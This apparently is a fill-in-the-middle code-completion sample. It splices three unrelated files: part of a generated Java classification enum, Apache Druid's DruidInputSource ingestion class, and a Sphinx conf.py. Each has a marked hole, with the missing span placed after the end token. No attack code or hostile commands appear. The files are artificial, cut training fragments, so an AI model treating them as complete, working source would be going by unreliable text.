if (UQClassificationType.name().equals(name())) { return ClassificationCodeType.String; }
if (BarCls.name().equals(name())) { return ClassificationCodeType.String; }
if (FooCls.name().equals(name())) { return ClassificationCodeType.String; }
if (Flg.name().equals(name())) { return ClassificationCodeType.Number; }
if (MemberStatus.name().equals(name())) { return ClassificationCodeType.String; }
if (ProductStatus.name().equals(name())) { return ClassificationCodeType.String; }
return ClassificationCodeType.String; // as default
}
public ClassificationUndefinedHandlingType undefinedHandlingType() {
if (ServiceRank.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
if (Region.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
if (WithdrawalReason.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
if (PaymentMethod.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
if (GroupingReference.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
if (SelfReference.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
if (TopCommentOnly.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
if (SubItemImplicit.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
if (SubItemTable.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
if (BooleanFlg.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
if (VariantRelationMasterType.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
if (VariantRelationQuxType.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
if (QuxCls.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
if (EscapedDfpropCls.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
if (EscapedJavaDocCls.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
if (EscapedNumberInitialCls.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
if (LineSepCommentCls.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
if (NamingDefaultCamelizingType.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
if (NamingNoCamelizingType.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
if (DeprecatedTopBasicType.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
if (DeprecatedMapBasicType.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
if (DeprecatedMapCollaborationType.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
if (UQClassificationType.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
if (BarCls.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
if (FooCls.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
if (Flg.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
if (MemberStatus.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
if (ProductStatus.name().equals(name())) { return ClassificationUndefinedHandlingType.EXCEPTION; }
return ClassificationUndefinedHandlingType.LOGGING; // as default
}
public static OptionalThing<CDef.DefMeta> find(String classificationName) { // instead of valueOf()
if (classificationName == null) { throw new IllegalArgumentException("The argument 'classificationName' should not be null."); }
if (ServiceRank.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.ServiceRank); }
if (Region.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.Region); }
if (WithdrawalReason.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.WithdrawalReason); }
if (PaymentMethod.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.PaymentMethod); }
if (GroupingReference.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.GroupingReference); }
if (SelfReference.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.SelfReference); }
if (TopCommentOnly.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.TopCommentOnly); }
if (SubItemImplicit.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.SubItemImplicit); }
if (SubItemTable.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.SubItemTable); }
if (BooleanFlg.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.BooleanFlg); }
if (VariantRelationMasterType.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.VariantRelationMasterType); }
if (VariantRelationQuxType.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.VariantRelationQuxType); }
if (QuxCls.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.QuxCls); }
if (EscapedDfpropCls.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.EscapedDfpropCls); }
if (EscapedJavaDocCls.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.EscapedJavaDocCls); }
if (EscapedNumberInitialCls.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.EscapedNumberInitialCls); }
if (LineSepCommentCls.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.LineSepCommentCls); }
if (NamingDefaultCamelizingType.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.NamingDefaultCamelizingType); }
if (NamingNoCamelizingType.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.NamingNoCamelizingType); }
if (DeprecatedTopBasicType.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.DeprecatedTopBasicType); }
if (DeprecatedMapBasicType.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.DeprecatedMapBasicType); }
if (DeprecatedMapCollaborationType.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.DeprecatedMapCollaborationType); }
if (UQClassificationType.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.UQClassificationType); }
if (BarCls.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.BarCls); }
if (FooCls.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.FooCls); }
if (Flg.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.Flg); }
if (MemberStatus.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.MemberStatus); }
if (ProductStatus.name().equalsIgnoreCase(classificationName)) { return OptionalThing.of(CDef.DefMeta.ProductStatus); }
return OptionalThing.ofNullable(null, () -> {
throw new ClassificationNotFoundException("Unknown classification: " + classificationName);
});
}
public static CDef.DefMeta meta(String classificationName) { // old style so use find(name)
if (classificationName == null) { throw new IllegalArgumentException("The argument 'classificationName' should not be null."); }
if (ServiceRank.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.ServiceRank; }
if (Region.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.Region; }
if (WithdrawalReason.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.WithdrawalReason; }
if (PaymentMethod.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.PaymentMethod; }
if (GroupingReference.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.GroupingReference; }
if (SelfReference.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.SelfReference; }
if (TopCommentOnly.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.TopCommentOnly; }
if (SubItemImplicit.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.SubItemImplicit; }
if (SubItemTable.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.SubItemTable; }
if (BooleanFlg.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.BooleanFlg; }
if (VariantRelationMasterType.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.VariantRelationMasterType; }
if (VariantRelationQuxType.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.VariantRelationQuxType; }
if (QuxCls.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.QuxCls; }
if (EscapedDfpropCls.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.EscapedDfpropCls; }
if (EscapedJavaDocCls.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.EscapedJavaDocCls; }
if (EscapedNumberInitialCls.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.EscapedNumberInitialCls; }
if (LineSepCommentCls.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.LineSepCommentCls; }
if (NamingDefaultCamelizingType.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.NamingDefaultCamelizingType; }
if (NamingNoCamelizingType.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.NamingNoCamelizingType; }
if (DeprecatedTopBasicType.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.DeprecatedTopBasicType; }
if (DeprecatedMapBasicType.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.DeprecatedMapBasicType; }
if (DeprecatedMapCollaborationType.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.DeprecatedMapCollaborationType; }
if (UQClassificationType.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.UQClassificationType; }
if (BarCls.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.BarCls; }
if (FooCls.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.FooCls; }
if (Flg.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.Flg; }
if (MemberStatus.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.MemberStatus; }
if (ProductStatus.name().equalsIgnoreCase(classificationName)) { return CDef.DefMeta.ProductStatus; }
throw new IllegalStateException("Unknown classification: " + classificationName);
}
@SuppressWarnings("unused")
private String[] xinternalEmptyString() {
return emptyStrings(); // to suppress 'unused' warning of import statement
}
}
}<|fim▁end|> | * @return The snapshot list of classification elements in the code list. (NotNull, EmptyAllowed: when empty specified)
*/
public static List<UQClassificationType> listOf(Collection<String> codeList) {
|
<|file_name|>DruidInputSource.java<|end_file_name|><|fim▁begin|>/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.apache.druid.indexing.input;
import com.fasterxml.jackson.annotation.JacksonInject;
import com.fasterxml.jackson.annotation.JsonCreator;
import com.fasterxml.jackson.annotation.JsonInclude;
import com.fasterxml.jackson.annotation.JsonInclude.Include;
import com.fasterxml.jackson.annotation.JsonProperty;
import com.google.common.base.Preconditions;
import com.google.common.collect.FluentIterable;
import com.google.common.collect.Iterators;
import org.apache.druid.client.coordinator.CoordinatorClient;
import org.apache.druid.data.input.AbstractInputSource;
import org.apache.druid.data.input.InputFileAttribute;
import org.apache.druid.data.input.InputFormat;
import org.apache.druid.data.input.InputRowSchema;
import org.apache.druid.data.input.InputSourceReader;
import org.apache.druid.data.input.InputSplit;
import org.apache.druid.data.input.MaxSizeSplitHintSpec;
import org.apache.druid.data.input.SegmentsSplitHintSpec;
import org.apache.druid.data.input.SplitHintSpec;
import org.apache.druid.data.input.impl.InputEntityIteratingReader;
import org.apache.druid.data.input.impl.SplittableInputSource;
import org.apache.druid.indexing.common.ReingestionTimelineUtils;
import org.apache.druid.indexing.common.RetryPolicy;
import org.apache.druid.indexing.common.RetryPolicyFactory;
import org.apache.druid.indexing.common.SegmentLoaderFactory;
import org.apache.druid.indexing.firehose.WindowedSegmentId;
import org.apache.druid.java.util.common.IAE;
import org.apache.druid.java.util.common.ISE;
import org.apache.druid.java.util.common.guava.Comparators;
import org.apache.druid.java.util.common.logger.Logger;
import org.apache.druid.query.filter.DimFilter;
import org.apache.druid.segment.IndexIO;
import org.apache.druid.segment.loading.SegmentLoader;
import org.apache.druid.timeline.DataSegment;
import org.apache.druid.timeline.TimelineObjectHolder;
import org.apache.druid.timeline.VersionedIntervalTimeline;
import org.apache.druid.timeline.partition.PartitionChunk;
import org.apache.druid.timeline.partition.PartitionHolder;
import org.apache.druid.utils.Streams;
import org.joda.time.Duration;
import org.joda.time.Interval;
import javax.annotation.Nullable;
import java.io.File;
import java.util.ArrayList;
import java.util.Collection;
import java.util.Collections;
import java.util.Comparator;
import java.util.HashMap;
import java.util.Iterator;
import java.util.List;
import java.util.Map;
import java.util.SortedMap;
import java.util.TreeMap;
import java.util.concurrent.ThreadLocalRandom;
import java.util.stream.Stream;
public class DruidInputSource extends AbstractInputSource implements SplittableInputSource<List<WindowedSegmentId>>
{
private static final Logger LOG = new Logger(DruidInputSource.class);
/**
* A Comparator that orders {@link WindowedSegmentId} mainly by segmentId (which is important), and then by intervals
* (which is arbitrary, and only here for totality of ordering).
*/
private static final Comparator<WindowedSegmentId> WINDOWED_SEGMENT_ID_COMPARATOR =
Comparator.comparing(WindowedSegmentId::getSegmentId)
.thenComparing(windowedSegmentId -> windowedSegmentId.getIntervals().size())
.thenComparing(
(WindowedSegmentId a, WindowedSegmentId b) -> {
// Same segmentId, same intervals list size. Compare each interval.
int cmp = 0;
for (int i = 0; i < a.getIntervals().size(); i++) {
cmp = Comparators.intervalsByStartThenEnd()
.compare(a.getIntervals().get(i), b.getIntervals().get(i));
if (cmp != 0) {
return cmp;
}
}
return cmp;
}
);
private final String dataSource;
// Exactly one of interval and segmentIds should be non-null. Typically 'interval' is specified directly
// by the user creating this firehose and 'segmentIds' is used for sub-tasks if it is split for parallel
// batch ingestion.
@Nullable
private final Interval interval;
@Nullable
private final List<WindowedSegmentId> segmentIds;
private final DimFilter dimFilter;
private final List<String> dimensions;
private final List<String> metrics;
private final IndexIO indexIO;
private final CoordinatorClient coordinatorClient;
private final SegmentLoaderFactory segmentLoaderFactory;
private final RetryPolicyFactory retryPolicyFactory;
@JsonCreator
public DruidInputSource(
@JsonProperty("dataSource") final String dataSource,
@JsonProperty("interval") @Nullable Interval interval,
// Specifying "segments" is intended only for when this FirehoseFactory has split itself,
// not for direct end user use.
@JsonProperty("segments") @Nullable List<WindowedSegmentId> segmentIds,
@JsonProperty("filter") DimFilter dimFilter,
@Nullable @JsonProperty("dimensions") List<String> dimensions,
@Nullable @JsonProperty("metrics") List<String> metrics,
@JacksonInject IndexIO indexIO,
@JacksonInject CoordinatorClient coordinatorClient,
@JacksonInject SegmentLoaderFactory segmentLoaderFactory,
@JacksonInject RetryPolicyFactory retryPolicyFactory
)
{
Preconditions.checkNotNull(dataSource, "dataSource");
if ((interval == null && segmentIds == null) || (interval != null && segmentIds != null)) {
throw new IAE("Specify exactly one of 'interval' and 'segments'");
}
this.dataSource = dataSource;
this.interval = interval;
this.segmentIds = segmentIds;
this.dimFilter = dimFilter;
this.dimensions = dimensions;
this.metrics = metrics;
this.indexIO = Preconditions.checkNotNull(indexIO, "null IndexIO");
this.coordinatorClient = Preconditions.checkNotNull(coordinatorClient, "null CoordinatorClient");
this.segmentLoaderFactory = Preconditions.checkNotNull(segmentLoaderFactory, "null SegmentLoaderFactory");
this.retryPolicyFactory = Preconditions.checkNotNull(retryPolicyFactory, "null RetryPolicyFactory");
}
@JsonProperty
public String getDataSource()
{<|fim▁hole|> @JsonProperty
public Interval getInterval()
{
return interval;
}
@Nullable
@JsonProperty("segments")
@JsonInclude(Include.NON_NULL)
public List<WindowedSegmentId> getSegmentIds()
{
return segmentIds;
}
@JsonProperty("filter")
public DimFilter getDimFilter()
{
return dimFilter;
}
@JsonProperty
public List<String> getDimensions()
{
return dimensions;
}
@JsonProperty
public List<String> getMetrics()
{
return metrics;
}
@Override
protected InputSourceReader fixedFormatReader(InputRowSchema inputRowSchema, @Nullable File temporaryDirectory)
{
final SegmentLoader segmentLoader = segmentLoaderFactory.manufacturate(temporaryDirectory);
final List<TimelineObjectHolder<String, DataSegment>> timeline = createTimeline();
final Iterator<DruidSegmentInputEntity> entityIterator = FluentIterable
.from(timeline)
.transformAndConcat(holder -> {
//noinspection ConstantConditions
final PartitionHolder<DataSegment> partitionHolder = holder.getObject();
//noinspection ConstantConditions
return FluentIterable
.from(partitionHolder)
.transform(chunk -> new DruidSegmentInputEntity(segmentLoader, chunk.getObject(), holder.getInterval()));
}).iterator();
final List<String> effectiveDimensions = ReingestionTimelineUtils.getDimensionsToReingest(
dimensions,
inputRowSchema.getDimensionsSpec(),
timeline
);
List<String> effectiveMetrics;
if (metrics == null) {
effectiveMetrics = ReingestionTimelineUtils.getUniqueMetrics(timeline);
} else {
effectiveMetrics = metrics;
}
final DruidSegmentInputFormat inputFormat = new DruidSegmentInputFormat(
indexIO,
dimFilter,
effectiveDimensions,
effectiveMetrics
);
return new InputEntityIteratingReader(
inputRowSchema,
inputFormat,
entityIterator,
temporaryDirectory
);
}
private List<TimelineObjectHolder<String, DataSegment>> createTimeline()
{
if (interval == null) {
return getTimelineForSegmentIds(coordinatorClient, dataSource, segmentIds);
} else {
return getTimelineForInterval(coordinatorClient, retryPolicyFactory, dataSource, interval);
}
}
@Override
public Stream<InputSplit<List<WindowedSegmentId>>> createSplits(
InputFormat inputFormat,
@Nullable SplitHintSpec splitHintSpec
)
{
// segmentIds is supposed to be specified by the supervisor task during the parallel indexing.
// If it's not null, segments are already split by the supervisor task and further split won't happen.
if (segmentIds == null) {
return Streams.sequentialStreamFrom(
createSplits(
coordinatorClient,
retryPolicyFactory,
dataSource,
interval,
splitHintSpec == null ? SplittableInputSource.DEFAULT_SPLIT_HINT_SPEC : splitHintSpec
)
);
} else {
return Stream.of(new InputSplit<>(segmentIds));
}
}
@Override
public int estimateNumSplits(InputFormat inputFormat, @Nullable SplitHintSpec splitHintSpec)
{
// segmentIds is supposed to be specified by the supervisor task during the parallel indexing.
// If it's not null, segments are already split by the supervisor task and further split won't happen.
if (segmentIds == null) {
return Iterators.size(
createSplits(
coordinatorClient,
retryPolicyFactory,
dataSource,
interval,
splitHintSpec == null ? SplittableInputSource.DEFAULT_SPLIT_HINT_SPEC : splitHintSpec
)
);
} else {
return 1;
}
}
@Override
public SplittableInputSource<List<WindowedSegmentId>> withSplit(InputSplit<List<WindowedSegmentId>> split)
{
return new DruidInputSource(
dataSource,
null,
split.get(),
dimFilter,
dimensions,
metrics,
indexIO,
coordinatorClient,
segmentLoaderFactory,
retryPolicyFactory
);
}
@Override
public boolean needsFormat()
{
return false;
}
public static Iterator<InputSplit<List<WindowedSegmentId>>> createSplits(
CoordinatorClient coordinatorClient,
RetryPolicyFactory retryPolicyFactory,
String dataSource,
Interval interval,
SplitHintSpec splitHintSpec
)
{
final SplitHintSpec convertedSplitHintSpec;
if (splitHintSpec instanceof SegmentsSplitHintSpec) {
final SegmentsSplitHintSpec segmentsSplitHintSpec = (SegmentsSplitHintSpec) splitHintSpec;
convertedSplitHintSpec = new MaxSizeSplitHintSpec(
segmentsSplitHintSpec.getMaxInputSegmentBytesPerTask(),
segmentsSplitHintSpec.getMaxNumSegments()
);
} else {
convertedSplitHintSpec = splitHintSpec;
}
final List<TimelineObjectHolder<String, DataSegment>> timelineSegments = getTimelineForInterval(
coordinatorClient,
retryPolicyFactory,
dataSource,
interval
);
final Map<WindowedSegmentId, Long> segmentIdToSize = createWindowedSegmentIdFromTimeline(timelineSegments);
//noinspection ConstantConditions
return Iterators.transform(
convertedSplitHintSpec.split(
// segmentIdToSize is sorted by segment ID; useful for grouping up segments from the same time chunk into
// the same input split.
segmentIdToSize.keySet().iterator(),
segmentId -> new InputFileAttribute(
Preconditions.checkNotNull(segmentIdToSize.get(segmentId), "segment size for [%s]", segmentId)
)
),
InputSplit::new
);
}
/**
* Returns a map of {@link WindowedSegmentId} to size, sorted by {@link WindowedSegmentId#getSegmentId()}.
*/
private static SortedMap<WindowedSegmentId, Long> createWindowedSegmentIdFromTimeline(
List<TimelineObjectHolder<String, DataSegment>> timelineHolders
)
{
Map<DataSegment, WindowedSegmentId> windowedSegmentIds = new HashMap<>();
for (TimelineObjectHolder<String, DataSegment> holder : timelineHolders) {
for (PartitionChunk<DataSegment> chunk : holder.getObject()) {
windowedSegmentIds.computeIfAbsent(
chunk.getObject(),
segment -> new WindowedSegmentId(segment.getId().toString(), new ArrayList<>())
).addInterval(holder.getInterval());
}
}
// It is important to create this map after windowedSegmentIds is completely filled, because WindowedSegmentIds
// can be updated while being constructed. (Intervals are added.)
SortedMap<WindowedSegmentId, Long> segmentSizeMap = new TreeMap<>(WINDOWED_SEGMENT_ID_COMPARATOR);
windowedSegmentIds.forEach((segment, segmentId) -> segmentSizeMap.put(segmentId, segment.getSize()));
return segmentSizeMap;
}
public static List<TimelineObjectHolder<String, DataSegment>> getTimelineForInterval(
CoordinatorClient coordinatorClient,
RetryPolicyFactory retryPolicyFactory,
String dataSource,
Interval interval
)
{
Preconditions.checkNotNull(interval);
// This call used to use the TaskActionClient, so for compatibility we use the same retry configuration
// as TaskActionClient.
final RetryPolicy retryPolicy = retryPolicyFactory.makeRetryPolicy();
Collection<DataSegment> usedSegments;
while (true) {
try {
usedSegments = coordinatorClient.fetchUsedSegmentsInDataSourceForIntervals(
dataSource,
Collections.singletonList(interval)
);
break;
}
catch (Throwable e) {
LOG.warn(e, "Exception getting database segments");
final Duration delay = retryPolicy.getAndIncrementRetryDelay();
if (delay == null) {
throw e;
} else {
final long sleepTime = jitter(delay.getMillis());
LOG.info("Will try again in [%s].", new Duration(sleepTime).toString());
try {
Thread.sleep(sleepTime);
}
catch (InterruptedException e2) {
throw new RuntimeException(e2);
}
}
}
}
return VersionedIntervalTimeline.forSegments(usedSegments).lookup(interval);
}
public static List<TimelineObjectHolder<String, DataSegment>> getTimelineForSegmentIds(
CoordinatorClient coordinatorClient,
String dataSource,
List<WindowedSegmentId> segmentIds
)
{
final SortedMap<Interval, TimelineObjectHolder<String, DataSegment>> timeline = new TreeMap<>(
Comparators.intervalsByStartThenEnd()
);
for (WindowedSegmentId windowedSegmentId : Preconditions.checkNotNull(segmentIds, "segmentIds")) {
final DataSegment segment = coordinatorClient.fetchUsedSegment(
dataSource,
windowedSegmentId.getSegmentId()
);
for (Interval interval : windowedSegmentId.getIntervals()) {
final TimelineObjectHolder<String, DataSegment> existingHolder = timeline.get(interval);
if (existingHolder != null) {
if (!existingHolder.getVersion().equals(segment.getVersion())) {
throw new ISE("Timeline segments with the same interval should have the same version: " +
"existing version[%s] vs new segment[%s]", existingHolder.getVersion(), segment);
}
existingHolder.getObject().add(segment.getShardSpec().createChunk(segment));
} else {
timeline.put(
interval,
new TimelineObjectHolder<>(
interval,
segment.getInterval(),
segment.getVersion(),
new PartitionHolder<>(segment.getShardSpec().createChunk(segment))
)
);
}
}
}
// Validate that none of the given windows overlaps (except for when multiple segments share exactly the
// same interval).
Interval lastInterval = null;
for (Interval interval : timeline.keySet()) {
if (lastInterval != null && interval.overlaps(lastInterval)) {
throw new IAE(
"Distinct intervals in input segments may not overlap: [%s] vs [%s]",
lastInterval,
interval
);
}
lastInterval = interval;
}
return new ArrayList<>(timeline.values());
}
private static long jitter(long input)
{
final double jitter = ThreadLocalRandom.current().nextGaussian() * input / 4.0;
long retval = input + (long) jitter;
return retval < 0 ? 0 : retval;
}
}<|fim▁end|> | return dataSource;
}
@Nullable |
<|file_name|>conf.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import inspect
__location__ = os.path.join(os.getcwd(), os.path.dirname(
inspect.getfile(inspect.currentframe())))
import subprocess
output_dir = os.path.join(__location__, "../docs/_rst")
module_dir = os.path.join(__location__, "../mymeal")
cmd_line_template = "sphinx-apidoc -f -o {outputdir} {moduledir}"
cmd_line = cmd_line_template.format(outputdir=output_dir, moduledir=module_dir)
subprocess.call(cmd_line, shell=True)
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.intersphinx', 'sphinx.ext.todo',
'sphinx.ext.autosummary', 'sphinx.ext.viewcode', 'sphinx.ext.coverage',
'sphinx.ext.doctest', 'sphinx.ext.ifconfig', 'sphinx.ext.pngmath']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'mymeal'
copyright = u'2014, Michael Ziegler'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '' # Is set by calling `setup.py docs`
# The full version, including alpha/beta/rc tags.
release = '' # Is set by calling `setup.py docs`
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
# language = None
<|fim▁hole|># today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
try:
from mymeal import __version__ as version
except ImportError:
pass
else:
release = version
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = ""
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_domain_indices = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'mymeal-doc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
# 'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'user_guide.tex', u'mymeal Documentation',
u'Michael Ziegler', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = ""
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# If true, show page references after internal links.
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_domain_indices = True
# -- External mapping ------------------------------------------------------------
python_version = '.'.join(map(str, sys.version_info[0:2]))
intersphinx_mapping = {
'sphinx': ('http://sphinx.pocoo.org', None),
'python': ('http://docs.python.org/' + python_version, None),
'matplotlib': ('http://matplotlib.sourceforge.net', None),
'numpy': ('http://docs.scipy.org/doc/numpy', None),
'sklearn': ('http://scikit-learn.org/stable', None),
'pandas': ('http://pandas.pydata.org/pandas-docs/stable', None),
'scipy': ('http://docs.scipy.org/doc/scipy/reference/', None),
}<|fim▁end|> | # There are two options for replacing |today|: either, you set today to some
